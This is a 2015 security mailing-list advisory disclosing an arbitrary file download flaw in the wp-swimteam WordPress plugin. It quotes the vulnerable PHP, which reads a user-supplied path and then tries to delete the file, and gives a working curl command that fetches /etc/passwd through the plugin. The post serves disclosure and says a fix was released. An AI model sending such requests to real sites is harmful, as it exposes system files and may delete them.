Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-id: <61244B9F-F7C6-40EE-BCB1-66B8ABBF21E8@me.com>
Date: Wed, 08 Jul 2015 06:52:35 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Cc: fulldisclosure@...lists.org
Subject: Remote file download vulnerability in Wordpress Plugin wp-swimteam
 v1.44.10777

Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:


 50             $file = urldecode($args['file']) ;
 51             $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
 52 
 53             while (!feof($fh))
 54                 $txt .= fread($fh, 1024) ;
 55 
 56             //  Clean up the temporary file - permissions
 57             //  may prevent this from succeedeing so use the '@'
 58             //  to suppress any messages from PHP.
 59 
 60             @unlink($file) ;
 61         }
 62 
 63         $filename = urldecode($args['filename']) ;
 64         $contenttype = urldecode($args['contenttype']) ;
 65 
 66         // Tell browser to expect a text file of some sort (usually txt or csv)
 67 
 68         header(sprintf('Content-Type: application/%s', $contenttype)) ;
 69         header(sprintf('Content-disposition:  attachment; filename=%s', $filename)) ;
 70         print $txt ;

CVEID:
OSVDB:
Exploit Code:
	• $ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.